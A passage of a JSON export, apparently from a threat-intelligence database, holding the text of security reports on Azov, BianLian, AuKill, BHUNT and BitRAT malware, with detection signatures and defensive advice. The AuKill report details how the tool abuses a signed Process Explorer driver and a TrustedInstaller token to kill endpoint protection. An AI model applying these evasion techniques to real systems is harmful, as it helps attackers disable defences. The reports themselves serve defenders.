who do not\n\nneed a decryptor, and just want to prevent the leaking of stolen data.\n\nThe ransomware is currently being analyzed for weaknesses, and\n\nBleepingComputer does not advise victims to pay the ransom until its\n\ndetermined if a free decryptor can recover files for free.\n\n\f\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-14T15:13:39.281Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_on": {
    "$date": "2023-09-14T15:26:06.385Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "65033ce8106ab198451fbe4d"
  },
  "name": "Azov Ransomware",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Azov Ransomware.pdf",
  "file_size": "40 KB",
  "content": "The Azov Ransomware continues to be heavily distributed worldwide, now\n\nproven to be a data wiper that intentionally destroys victims' data and infects\n\nother programs.\n\nLast month, a threat actor began distributing malware called 'Azov\n\nRansomware' through cracks and pirated software that pretended to encrypt\n\nvictims' files.\n\nHowever, instead of providing contact info to negotiate a ransom, the ransom\n\nnote told victims to contact security researchers and journalists to frame them\n\nas the developers of the ransomware.\n\nTop Stories\n\nAs there was no contact info, and the listed contacts had no way of helping\nvictims, we assumed that the malware was a data wiper.\n\nA diabolical data wiper\n\nLast week, Checkpoint security researcher Ji Vinopal analyzed the Azov\n\nRansomware and confirmed to BleepingComputer that the malware was\n\nspecially crafted to corrupt data.\n\nThe malware included a trigger time that would cause it to sit dormant on the\n\nvictim's devices until October 27th, 2022, at 10:14:30 AM UTC, which would\n\nthen trigger the corruption of all data on the device.\n\nVinopal says it would overwrite a file's contents and corrupt data in\n\nalternating 666-byte chunks of garbage data. The number 666 is commonly\n\n\fassociated with the biblical 'Devil,' clearly showing the malicious intent of the\n\nthreat actor.\n\n\"Each cycle exactly 666 bytes are being overwritten with random (uninitialized\n\ndata) and the next 666 bytes are left original,\" Vinopal told\n\nBleepingComputer.\n\n\"This works in a loop, so wiped file structure would look like this: 666 bytes of\n\ngarbage, 666 bytes original, 666bytes of garbage, 666 bytes original, etc\"\n\nWhen backdooring an executable, the malware will inject code that will cause\n\nthe data wiper to launch when a seemingly harmless executable is launched.\n\n\"Backdooring of the files works in a polymorphic way, which means the same\n\nshellcodes used to backdoor files are every time encoded differently,\"\n\nexplained Vinopal.\n\n\"(ex. if the same file A would be backdoored 2 times to file B1 and B2, B1 and\n\nB2 shellcode parts are different so B1 and B2 are also different on the disk) -\n\nthis is used probably to avoid static AV detection.\"\n\nToday, the threat actor continues distributing the malware through the\n\nSmokeloader botnet, commonly found in fake pirated software and crack sites.\n\nAt the time of this writing, there are already pages of submissions of this\n\nmalware to VirusTotal for today alone, showing how many victims have been\n\naffected by this malware over the past two weeks.\n\nIt is unclear why the threat actor is spending money to distribute a data wiper.\n\nHowever, theories range from it being done to cover up other malicious\n\nbehavior or simply to 'troll' the cybersecurity community.\n\n\fRegardless of the reason, victims who are infected with Azov Ransomware will\n\nhave no way of recovering their files, and as other executables are infected,\n\nthey should reinstall Windows to be safe.\n\nFurthermore, as Smokeloader is being used to distribute the Azov data wiper,\n\nit is likely also installed with other malware, such as password-stealing\n\nmalware. Therefore, it is essential to reset any passwords to email accounts,\n\nfinancial services, or other sensitive information.\n\nFinally, while the ransomware is named after the Ukrainian 'Azov' military\n\nregiment, this malware is likely not affiliated with the country and is just using\n\nthe name as a false flag.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-14T17:03:36.979Z"
  },
  "added_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6504c5de7af35aa6d9de6ca9"
  },
  "name": "BianLian",
  "file_type": null,
  "website_url": "https://fortiguard.fortinet.com/threat-signal-report/5166",
  "website_title": "Threat Signal Report",
  "file_name": null,
  "file_size": null,
  "content": "#StopRansomware: BianLian Ransomware Group (CISA) Ransomware Roundup: Snatch, BianLian and Agenda (Fortinet)  Copyright © 2023 Fortinet, Inc. All Rights Reserved.                                                                                                                                                                                                        ► Home Threat Signal Report #StopRansomware: BianLian Ransomware  MSIL/BianLian.A!tr.ransom W64/BianLian.A!tr.ransom W32/BianLian.c7ec!tr.ransom W32/BianLian.7abe!tr.ransom W64/Filecoder.BT!tr.ransom W32/Filecoder.BT!tr W32/RANSOM.HR!tr W64/Filecoder.GG!tr W64/Agent.RA!tr W64/Agent.FEDE!tr W64/Agent.FCF9!tr W64/Agent.ED2A!tr W64/Agent.538F!tr W64/Agent.6D96!tr W64/Agent.9A59!tr W64/Agent.7D10!tr W32/PossibleThreat PossibleThreat.PALLAS.M PossibleThreat.PALLAS.H Malicious_Behavior.SB Contact Us Legal Privacy FAQ Partners Feedback",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-15T21:00:14.411Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-15T21:05:08.888Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "6508937d76c6117df3c23ef7"
  },
  "name": "Aukill",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Aukill.pdf",
  "file_size": "66 KB",
  "content": "Over the past several months, Sophos X-Ops has investigated multiple\nincidents where attackers attempted to disable EDR clients with a new\ndefense evasion tool weve dubbed AuKill. The AuKill tool abuses an outdated\nversion of the driver used by version 16.32 of the Microsoft utility, Process\nExplorer, to disable EDR processes before deploying either a backdoor or\nransomware on the target system.\n\nThe tool was used during at least three ransomware incidents since the\nbeginning of 2023 to sabotage the targets protection and deploy the\nransomware: In January and February, attackers deployed Medusa Locker\nransomware after using the tool; in February, an attacker used AuKill just prior\nto deploying Lockbit ransomware.\n\nThis is not the rst time we and other vendors reported on multiple threat\ngroups simultaneously deploying software designed to kill EDR agents that\nprotect computers. In December 2022, Sophos, Microsoft, Mandiant, and\nSentinelOne reported that a number of attackers had used custom-built\ndrivers to disable EDR products.\n\nIn contrast, the AuKill tool abused a legitimate, but out-of-date and exploitable,\ndriver. This technique is commonly referred to as a bring your own vulnerable\ndriver (BYOVD) attack.\n\nThe method of abusing the Process Explorer driver to bypass EDR systems\nisnt new; it was implemented in the open-source tool Backstab, rst published\nin June 2021. In fact, Sophos and other security vendors have previously\nreported on multiple incidents where either Backstab, or a version of this\ndriver, was used for malicious purposes.\n\nLast November, for example, Sophos X-Ops reported that a threat actor\nworking for the LockBit ransomware group used Backstab to disable EDR\nprocesses on an infected machine. Three months later, Sentinel One\npublished a report about a tool they called MalVirt, which uses the same\nProcess Explorer driver to disable security products before deploying the nal\npayload on the target machine.\n\n\fThrough analysis and threat hunting, Sophos has collected six different\nvariants of the AuKill malware. We have found multiple similarities between\nthe open-source tool Backstab and AuKill. Some of these similarities include\nsimilar, characteristic debug strings, and nearly identical code ow logic to\ninteract with the driver.\n\nAuKill entries (highlighted) in the list of Windows Services\n\nSophos believes the author of AuKill used multiple code snippets from, and\nbuilt their malware around, the core technique introduced by Backstab.\n\nLegitimate Driver Abuse and Procexp.sys\n\nThreat actors increasingly have been relying on abusable drivers to disable\nsecurity tools. Drivers are low-level system components that can access\ncritical security structures in kernel memory. As a security mechanism,\nWindows by default employs a feature called Driver Signature Enforcement\nthat ensures kernel-mode drivers have been signed by a valid code signing\nauthority before Windows will permit them to run. This signature serves as a\nsign of trust to verify the identity of the software and to protect a users\nsystem.\n\nTo get around this security measure, adversaries need to either contrive a way\nto get a malicious driver signed by a trusted certicate (like we discussed in\nour December research), or (as is more common) abuse a legitimate\ncommercial software driver to reach their goal, in a BYOVD attack.\n\nIn this case, the attackers took advantage of a driver both created by and\nsigned by Microsoft. The Process Explorer driver, part of their suite of\nadministration tools produced by the Sysinternals team, implements a variety\nof features to interact with running processes.\n\nAuKill drops a driver named PROCEXP.SYS (from the release version 16.32 of\nprocess Explorer) into the C:\\Windows\\System32\\drivers path. The legitimate\n\n\fProcess Explorer driver is named PROCEXP152.sys, and normally is found in\nthe same location. Both drivers can be present on a machine that has a copy\nof Process Explorer running. The AuKill installer also drops an executable\ncopy of itself to either the System32 or the TEMP directory, which it runs as a\nservice.\n\nThe maliciously installed Process Explorer driver, highlighted in red, in the Drivers folder\nalongside the legitimate Process Explorer driver, proxexp152.sys\n\nFor example, the driver can receive the IO control code\nIOCTL_CLOSE_HANDLE from user-mode applications, which commands the\ndriver to close a protected process handle, resulting in terminating a process.\n\nAbusing this process requires the attacker to use administrative privileges on\nthe system. Normally, when an attacker obtains administrative privileges, it\nmeans that they have full control over the machine.\n\nHowever, critical processes on Windows, such as endpoint clients, are under\nadditional protection features to prevent attackers from disabling them once\nthey escalate privileges. An example of an additional protection feature is the\nProtected Antimalware Services concept introduced in Windows 8.1.\n\nTo circumvent such features, attackers need to go one level deeper  to run a\ndriver in kernel-mode. In this case, AuKill abuses the legitimate driver behind\nProcess Explorer to overcome these features.\n\nThe AuKill tool requires administrative privileges to work, but it cannot give the\nattacker those privileges. The threat actors using AuKill took advantage of\nexisting privileges during the attacks, when they gained them through other\nmeans.\n\nTechnical analysis of AuKills evolution\n\n\fOver the last three months, we collected six different versions and tracked the\nfunctionality changes from version to version. For simplicity, we dubbed the\noldest version of the malware as AuKill V1, the most recent version as AuKill\nV6.\n\nNotably, the compiler and targeted security components changed. Figure 1\ndisplays a timeline of the following events:\n\n  The compilation time stamp of the AuKill version. The rst event for\nexample displays that the binary AuKill V1 contains a compilation\ntimestamp of the date 2022-11-13.\n\n  The date of when a corresponding sample was scanned the rst time in\nour internal systems. On 2022-11-17 for example, the rst time AuKill V1\nappeared in our internal systems.\n\n  For correlation, we also added the timestamps when we were able to\nlink this malware to specic ransomware attacks. On 2023-01-18, we\nwere unable to obtain the AuKill sample used in the incident. However,\non the 2023-02-14, we linked AuKill V1 to another incident, where the\nthreat actors tried to deploy Medusa Locker.\n\nWhile the compilation time stamp of a PE le can indeed be faked, if we\nreconstruct the time delta between the moment the le was compiled and the\ntime it initially appeared in our systems, it seems likely the compilation time\nstamps are the actual ones.\n\n\fCompilation timestamps, hashes, and targets of each version we analyzed\n\nOur analysis focuses primarily on the samples labeled AuKill V1 and AuKill V6.\nV1 was seen in most incidents, however AuKill V6 seems to be an\nexperimental version that introduces interesting changes. In the upcoming\nsections we refer to V6 as the debug (or experimental) version. (Full\nindicators-of-compromise for this malware are posted to the SophosLabs\nGithub.)\n\n\fA comparison between these two versions gives interesting insights into the\npossible direction of future updates.\n\nPhase 1: Installing The Service\n\nWhen executed, the malware rst checks if it has administrator privileges. It\nalso requires that the attacker runs the le with a keyword (or password) as\nthe rst argument on the command line. The execution aborts if either of\nthese requirements are not fullled. (The attacker needs to acquire\nadministrative rights before they can run the tool.)\n\nFor both samples covered in this analysis section (and all six samples listed in\nthe IOCs), attackers need to pass the string startkey as the rst command line\nargument.\n\nThe malware validates the password/keyword using a simple arithmetic sum\ncalculation. It iterates a process where it derives the decimal value of the\nASCII code for each character, doubles the value, then adds it to the next\ncharacters decimal value, which is then doubled, and so on.\n\nAfter the calculation is nished, the sum result is returned and compared\nagainst a hardcoded expected value, in this case 57502 (represented as the\nhexadecimal value 0xE09E). The python implementation of the algorithm is\ndisplayed below.\n\nIf the sample does not run with SYSTEM privileges, it continues by attempting\nto elevate its rights by impersonating the security context of\nTrustedInstaller.exe.\n\nFirst, AuKill starts the Trusted Installer service. Then it duplicates the token of\nTrustedInstaller.exe using the DuplicateTokenW WINAPI function, and passes\n\n\fthe token to CreateProcessWithTokenW to elevate itself to SYSTEM once the\nprocess restarts.\n\nFinally, it copies itself to C:\\Windows\\system32, installs itself as a service,\nand starts the service.\n\nPhase 2: Disabling Security\n\nOnce the malware establishes persistence by creating the service entry, it\ndrops procexp.sys onto disk. The driver is embedded in AuKill as a resource.\nBoth versions covered in this analysis drop procexp.sys into\nC:\\Windows\\System32\\drivers. The gure below shows decompiled code of\nV1, where the malware reads procexp.sys from resources and writes it to disk.\n\nNotably, the debug version also tries to connect to a driver named\nWindowsKernelExplorer.sys as a fallback, in case it fails to drop and load\nprocexp.sys. However, the fallback driver is not embedded in the resources\nlike procexp.sys. It expects that this driver, part of, already exists in the\nSystem32\\drivers folder.\n\nAt this point we cant conrm that the driver in the linked repository is the one\nbeing abused here.\n\nAuKill prevents services from restarting\n\nAn EDR client usually consists of multiple components that work in\nconjunction. A component could be (for example) an installed service or\nrunning process, each with its own functionality. Therefore, if one crashes or\nterminates, it usually restarts as soon as possible.\n\n\fTo prevent these components from restarting, AuKill starts several threads to\nensure that these EDR processes and services stay disabled. Each thread\ntargets a different component and continuously probes if the targeted\nprocesses or services are running. If any of them are, AuKill disables or\nterminates it. The initialization of these threads can be seen in gure 6.\n\nThe targeted vendors and services vary from sample to sample. Below gure\n6, we also share an analysis of the different functions used to disable EDR\ncomponents we found through reverse engineering.\n\n1  Terminate Via Procexp\n\nThe rst type of function takes a list of process names as input and is called\nTerminateViaProcexp in the image above.\n\nIt iterates through all running processes. If a process name is included in the\nlist, AuKill sends IO control code IOCTL_CLOSE_HANDLE to procexp.sys to\nclose the process handle. This results in terminating the targeted process.\n\nAuKill V6 starts two threads running this function. The rst thread targets a\nlist of Microsoft related security processes and the second one a list of\nvarious vendors. Most process names are related to security vendors.\nHowever, the creator also included a list of names for remote access tools in\nthe target list.\n\n2  Terminate Forcefully\n\nThe second type of function takes a list of vendors related process names as\nan argument and runs in a separate thread again. The malware iterates\nthrough all running processes and if a process name is included in this list,\nAuKill attempts to forcefully terminate it via TerminateProcess.\n\nThis thread was removed in the debug version but is included in other versions\nsuch as the version V2 of AuKill.\n\n\f3  Disable Services\n\nThe third function type is called DisableServices in the image above, and takes\na hardcoded list of service names as input.\n\nFor each service name in the list, AuKill checks if it exists, and if it does,\ndisables it by calling ChangeServiceCongW and passing SERVICE_DISABLED\nfor dwStartType.\n\nAgain, in AuKill V6 we see two threads being instanced running this function.\n\n4  Unload Drivers\n\nThe nal function type is called Unload Driver in gure 6 and takes a list of\nhardcoded driver names as an input.\n\nFor each driver name, AuKill tries to unload it via calling NtUnloadDriver and\ndeleting the corresponding registry key in the hive\nSystem\\CurrentControlSet\\Services\\[DRIVER_NAME].\n\nWeve only observed this function in AuKill V6.\n\nDriver Abuse Continues To Rise In\n\n2023\n\nDisabling EDR clients using drivers, whether they are legitimate and abused\nfor malicious purposes (BYOVD), or signed by a stolen/leaked certicate,\ncontinues to be popular among adversaries who want to disable defense\nmechanisms.\n\nLast year, the security community reported about multiple incidents, where\ndrivers have been weaponized for malicious purposes. The discovery of such\n\n\fa tool conrms our assumption that adversaries continue to weaponize\ndrivers, and we expect even more development in this area the upcoming\nmonths.\n\nDetection guidance\n\nCurrently, Sophos detects AuKill variants as ATK/BackStab-D. Additionally, we\nprotect customers with behavioral detections (such as the Priv_5a behavioral\nrule) against the attack scenario explained in this article. These protections do\nnot inhibit users from running legitimate copies of Process Explorer, nor do\nSophos products detect or remove the legitimate Process Explorer driver\nwhen it is used normally.\n\nSophos has notied Microsoft about this abuse of the deprecated Process\nExplorer driver.\n\nFinally, businesses and people can take additional steps to defend computers\nthey own against driver abuse:\n\nIt is highly suggested to check if your endpoint security product\nimplements and enables tamper protection. This feature provides a\nstrong layer against such type of attacks. If you use Sophos products\nbut dont currently have Sophos tamper protection enabled, turn it on\ntoday.\n\n  Practice strong Windows security roles hygiene. This attack is only\n\npossible if the attacker escalates privileges they control, or can obtain\nadministrator rights. Separation between user and admin privileges can\nhelp prevent attackers from easily loading drivers.\n\n  Keep your system updated. As we discussed in our December research,\nWindows maintains a list of drivers for which Microsoft has revoked\ncerticates, or deprecated drivers that have been historically abused,\nand updates that list through the Windows Update mechanism.\n\n \n\fIn addition to your operating system, its also important to check,\nperiodically, whether there are updates for applications and other tools\non your computer, and to remove older tools if they are no longer\nrequired or used.\nLegitimate driver abuse can also happen if a vulnerable driver already\nexists on the system. Having a strong vulnerability management\nprogram can aid in closing such protection gaps.\n\n \n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-18T18:14:21.642Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6509c2a433b5c31fe0e4ac6f"
  },
  "name": "BHunt",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "BHunt.pdf",
  "file_size": "64 KB",
  "content": "A novel modular crypto-wallet stealing malware dubbed 'BHUNT' has been\n\nspotted targeting cryptocurrency wallet contents, passwords, and security\n\nphrases.\n\nThis is yet another crypto-stealer added to a large pile of malware that targets\n\ndigital currency, but it is worth special attention due to its stealthiness.\n\nInfection vector\n\nThe discovery and analysis of the new BHUNT malware come from\n\nBitdefender, who shared their findings with Bleeping Computer before\n\npublishing.\n\nThousands of Juniper devices vulnerable to\n\nunauthenticated RCE flaw\n\nTo evade detection and triggering security warnings, BHUNT is packed and\n\nheavily encrypted using Themida and VMProtect, two virtual machine packers\n\nthat hinder reverse-engineering and analysis by researchers.\n\nThe threat actors signed the malware executable with a digital signature stolen\n\nfrom Piriform, the makers of CCleaner. However, as the malware developers\n\ncopied it from an unrelated executable, it's marked as invalid due to a binary\n\nmismatch.\n\nBitdefender discovered that BHUNT is injected into explorer.exe and is likely\n\ndelivered to the compromised system via KMSpico downloads, a popular\n\nutility for illegally activating Microsoft products.\n\n\fKMS (Key Management Services) is a Microsoft license activation system that\n\nsoftware pirates frequently abuse to activate Windows and Office products.\n\nBleepingComputer recently reported a similar case of malicious KMSPico\n\nactivators dropping cryptocurrency-wallet stealers to pirates' systems.\n\nThis malware has been detected worldwide, with its greatest concentration of\n\ninfected users in India, shown in the heat map below.\n\nBHUNT modules\n\nThe main component of BHUNT is 'mscrlib.exe,' which extracts further\n\nmodules that are launched on an infected system to perform different\n\nmalicious behavior.\n\nEach module is designed for a specific purpose ranging from stealing\n\ncryptocurrency wallets to stealing passwords. Using a modular approach, the\n\nthreat actors can customize BHUNT for different campaigns or easily add new\n\nfeatures.\n\nThe current modules included in the BHUNT 'mscrlib.exe' executable are\n\ndescribed below:\n\n blackjack  steals wallet le contents, encodes it with base 64, and\n\nuploads it to the C2 server\n\n chaos_crew  downloads payloads\n golden7  steals passwords from the clipboard and uploads the les to\n\nthe C2 server\n\n Sweet_Bonanza  steals information from browsers (Chrome, IE,\n\nFirefox, Opera, Safari)\n\n\f mrpropper  cleans up traces (argument les)\n\nThe targeted wallets are Exodus, Electrum, Atomic, Jaxx, Ethereum,\n\nBitcoin, and Litecoin.\n\nAs you can see in the code snippet below, the blackjack module is used to\n\nsearch for and steal cryptocurrency wallets on a user's device and send them to\n\na remote server under the attacker's control.\n\nOnce the threat actor gains access to the wallet's seed or configuration file,\n\nthey can use it to import the wallet on their own devices and steal the\n\ncontained cryptocurrency.\n\nAlthough BHUNT's focus is clearly financial, its information-stealing\n\ncapabilities could enable its operators to gather much more than just\n\ncrypto-wallet data.\n\n\"While the malware primarily focuses on stealing information related to\n\ncryptocurrency wallets, it can also harvest passwords and cookies stored in\n\nbrowser caches,\" - explains Bitdefender's report.\n\n\"This might include account passwords for social media, banking, etc. that\n\nmight even result in an online identity takeover.\"\n\nTo avoid being infected by BHUNT, you should simply avoid downloading\n\npirated software, cracks, and illegitimate product activators.\n\nAs it's been proven repeatedly, the projected financial savings from using\n\npirated software are insignificant compared to the damage they can cause to\n\ninfected systems.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-19T15:47:48.454Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6509d876cfaca2208ddff60a"
  },
  "name": "BianLian Ransomware",
  "file_type": null,
  "website_url": "https://fortiguard.fortinet.com/threat-signal-report/5166",
  "website_title": "Threat Signal Report | FortiGuard",
  "file_name": null,
  "file_size": null,
  "content": "► Home\nThreat Signal Report\n#StopRansomware: BianLian Ransomware\nID 42\nDate May 17, 2023\nThreat/\nVulnerability Ransomware\nThreat Level HIGH\nThreat Signal Report\n#StopRansomware: BianLian Ransomware\nDescription\nWhat is BianLian Ransomware? BianLian is a ransomware threat actor whose modus operandi is to add victims to its own data leak site in June 2022. BianLian also refers to the file encryptor (ransomware) used by the threat actor. Victims reportedly include critical infrastructure organizations in the U.S. and Australia.\nFortiGuard Labs previously reported BianLian in a Ransomware Roundup blog published on September 2nd, 2022.\nWhat is the Attack? The BianLian ransom threat actor leverages stolen and leaked Remote Desktop Protocol (RDP) credentials for initial access, FTP, Rclone, PowerShell scripts and a public could storage for data exfiltration, and abuses Impacket tools and PsExec for lateral movements. Furthermore, it installs Go-based backdoors and legitimate Remote Access software to establish external communications and persistence. Such activities are typically done prior to deploying a Go-based BianLian encryptor to the victims' networks for data encryption. It adds a \".bianlian\" file extension to files encrypted and leaves a ransom note labeled \"Files encrypted by BianLian encryptor have a \".bianlian\" file extension.\" The group was recently reported to have abandoned file encryption and focused only on data exfiltration, potentially because a free file decryptor was publicly made available.\nWhy is this Significant? This is significant because CISA released a new ransomware advisory for BianLian ransomware on May 16th, 2023, as part of their #StopRansomware effort. Organizations compromised by the BianLian ransomware threat actor likely will experience loss of data due to exfiltration, unwanted downtime, and ultimately, but not limited to - damage to an organization's reputation.\nWhat FortiGuard Coverage is available? FortiGuard Labs has the following AV signatures available for known BianLian ransomware samples:\nMSIL/BianLian.A!tr.ransom\nW64/BianLian.A!tr.ransom\nW32/BianLian.c7ec!tr.ransom\nW32/BianLian.7abe!tr.ransom\nW64/Filecoder.BT!tr.ransom\nW32/Filecoder.BT!tr\nW32/RANSOM.HR!tr\n\nThe following AV signatures may cover files and malware related to BianLian activities:\nW64/Filecoder.GG!tr\nW64/Agent.RA!tr\nW64/Agent.FEDE!tr\nW64/Agent.FCF9!tr\nW64/Agent.ED2A!tr\nW64/Agent.538F!tr\nW64/Agent.6D96!tr\nW64/Agent.9A59!tr\nW64/Agent.7D10!tr\nW32/PossibleThreat\nPossibleThreat.PALLAS.M\nPossibleThreat.PALLAS.H\nMalicious_Behavior.SB\n\nFortiGuard Labs Guidance Due to the ease of disruption, damage to daily operations, potential impact to an organization's reputation, and the unwanted destruction or release of personally identifiable information (PII), etc., it is vital to keep all AV and IPS signatures up to date.\nOrganizations will need to make foundational changes to the frequency, location, and security of their data backups to effectively deal with the evolving and rapidly expanding risk of ransomware. When coupled with digital supply chain compromise and a workforce telecommuting into the network, there is a real risk that attacks can originate from anywhere. Cloud-based security solutions, such as SASE, to protect off-network devices; advanced endpoint security, such as EDR (endpoint detection and response) solutions that can disrupt malware mid-attack; and Zero Trust Access and network segmentation strategies that restrict access to applications and resources based on policy and context, should all be investigated to minimize risk and to reduce the impact of a successful ransomware attack.\nAs part of the industry's leading fully integrated Security Fabric, delivering native synergy and automation across your security ecosystem, Fortinet also provides an extensive portfolio of technology and human-based as-a-service offerings. These services are powered by our global FortiGuard team of seasoned cybersecurity experts.\nOrganizations such as CISA, NCSC, the FBI, and HHS caution ransomware victims against paying a ransom partly because payment does not guarantee that files will be recovered. According to a U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) advisory, ransom payments may also embolden adversaries to target additional organizations, encourage other criminal actors to distribute ransomware, and/or fund illicit activities that could potentially be illegal. For organizations and individuals affected by ransomware, the FBI has a Ransomware Complaint page where victims can submit samples of ransomware activity via their Internet Crimes Complaint Center (IC3).\nFortiGuard Labs' Emergency Incident Response Service provides rapid and effective response when an incident is detected. And our Incident Readiness Subscription Service provides tools and guidance to help you better prepare for a cyber incident through readiness assessments, IR playbook development, and IR playbook testing (tabletop exercises).\nAppendix\n#StopRansomware: BianLian Ransomware Group (CISA)\nRansomware Roundup: Snatch, BianLian and Agenda (Fortinet)\n\n✖\nContact Us Legal Privacy FAQ Partners Feedback\nCopyright © 2023 Fortinet, Inc. All Rights Reserved.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-19T17:20:54.469Z"
  },
  "added_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6509dbe8cfaca2208ddff60b"
  },
  "name": "BitRAT",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "BitRAT.pdf",
  "file_size": "54 KB",
  "content": "Threat actors behind a recent malware campaign have been using the stolen\n\ninformation of bank customers in Colombia as lures in phishing emails\n\ndesigned to infect targets with the BitRAT remote access trojan, according to\n\ncloud security firm Qualys.\n\nThe company found that the infrastructure of an undisclosed Colombian\n\ncooperative bank had been hijacked by attackers while investigating BitRAT\n\nlures in active phishing attacks.\n\nA total of 418,777 records containing sensitive customer data, including\n\nnames, phone numbers, email addresses, addresses, Colombian national IDs,\n\npayment records, and salary information, were stolen from the breached\n\nservers.\n\nAPT36 state hackers infect Android devices\n\nusing YouTube app clones\n\nWhile investigating the campaign, Qualys also discovered evidence that the\n\nattackers had accessed customers' data, including logs showing that they\n\nlooked for SQL injection bugs using the sqlmap tool.\n\n\"Moreover, the lures themselves contain sensitive data from the bank to make\n\nthem appear legitimate. This means that the attacker has gotten access to\n\ncustomers data,\" Qualys said.\n\n\"While digging deeper into the infrastructure we identified logs that point to\n\nthe usage of the tool sqlmap to find potential SQLi faults, along with actual\n\ndatabase dumps.\"\n\nAt the moment, none of the information stolen from the Colombian bank's\n\nservers has been found on dark web or clearweb sites monitored by Qualys.\n\n\fThe malware is delivered to victims' computers via a malicious Excel file that\n\ndrops and executes an INF file encoded within a highly obfuscated macro\n\nbundled with the attachment.\n\nThe final BitRAT payload is then downloaded from a GitHub repository using\n\nthe WinHTTP library on the compromised device and executed with the help\n\nof the WinExec function.\n\nDuring the last stage of the attack, the RAT malware moves its loader to the\n\nWindows startup folder to gain persistence and automatically restart after\n\nsystem reboots.\n\nSince at least August 2020, BitRAT has been sold as off-the-shelf malware on\n\ndark web markets and cybercrime forums for as little as $20 for lifetime\n\naccess.\n\nAfter paying for a license, each \"customer\" uses their own approach to infect\n\nvictims with this malware, such as phishing, watering holes, and trojanized\n\nsoftware.\n\nThe highly versatile BitRAT can be used for a variety of malicious purposes,\n\nincluding recording video and audio, data theft, DDoS attacks, cryptocurrency\n\nmining, and delivering additional payloads.\n\n\"Commercial off the shelf. RATs have been evolving their methodology to\n\nspread and infect their victims,\" said Qualys threat research senior engineer\n\nAkshat Pradhan.\n\n\"They have also increased the usage of legitimate infrastructures to host their\n\npayloads and defenders need to account for it.\"\n\n\fA new BitRAT malware distribution campaign is underway, exploiting users\n\nlooking to activate pirated Windows OS versions for free using unofficial\n\nMicrosoft license activators.\n\nBitRAT is a powerful remote access trojan sold on cybercrime forums and dark\n\nweb markets for as low as $20 (lifetime access) to any cybercriminal who\n\nwants it.\n\nAs such, each buyer follows their own approach to malware distribution,\n\nranging from phishing, watering holes, or trojanized software.\n\nTargeting pirates with malware\n\nIn a new BitRAT malware distribution campaign discovered by researchers at\n\nAhnLab, threat actors are distributing the malware as a Windows 10 Pro\n\nlicense activator on webhards.\n\nWebhards are online storage services popular in South Korea that have a\n\nsteady influx of visitors from direct download links posted on social media\n\nplatforms or Discord. Due to their wide use in the region, threat actors are\n\nnow more commonly using webhards to distribute malware.\n\nThe actor behind the new BitRAT campaign appears to be Korean based on\n\nsome of the Korean characters in the code snippets and the manner of its\n\ndistribution.\n\nTo properly use Windows 10, you need to purchase and activate a license with\n\nMicrosoft. While there are ways to get Windows 10 for free, you still need a\n\nvalid Windows 7 license to get the free upgrade.\n\n\fThose who do not want to deal with licensing issues or do not have a license to\n\nupgrade commonly turn to pirating Windows 10 and using unofficial\n\nactivators, many of which contain malware.\n\nIn this campaign, the malicious file promoted as a Windows 10 activator is\n\nnamed 'W10DigitalActiviation.exe' and features a simple GUI with a button to\n\n\"Activate Windows 10.\"\n\nHowever, instead of activating the Windows license on the host system, the\n\n\"activator\" will download malware from a hardcoded command and control\n\nserver operated by the threat actors.\n\nThe fetched payload is BitRAT, installed in %TEMP% as\n\nSoftware_Reporter_Tool.exe and added to the Startup folder. The\n\ndownloader also adds exclusions for Windows Defender to ensure that BitRAT\n\nwont encounter detection issues.\n\nOnce the malware installation process is completed, the downloader deletes\n\nitself from the system leaving behind only BitRAT.\n\nA versatile RAT\n\nBitRAT is promoted as a powerful, inexpensive, and versatile malware that can\n\nsnatch a wide range of valuable information from the host, perform DDoS\n\nattacks, UAC bypass, etc.\n\nBitRAT supports generic keylogging, clipboard monitoring, webcam access,\n\naudio recording, credential theft from web browsers, and XMRig coin mining\n\nfunctionality.\n\n\fAdditionally, it offers remote control for Windows systems, hidden virtual\n\nnetwork computing (hVNC), and reverse proxy through SOCKS4 and SOCKS5\n\n(UDP). On that front, ASECs analysts have found strong code similarities with\n\nTinyNuke, and its derivative, AveMaria (Warzone).\n\nThe hidden desktop feature on these RATs is so valuable that some hacking\n\ngroups, like the Kimsuky, incorporated them in their arsenal just to use the\n\nhVNC tool.\n\nRisk of piracy\n\nEven if the legal and ethical aspects are ignored, using pirated software is\n\nalways a security gamble.\n\nThe more tools are used to activate illegally obtained copies of software or\n\ncrack their intellectual property protection systems, the greater the chances of\n\nending up with a nasty malware infection.\n\nThose who cant afford to 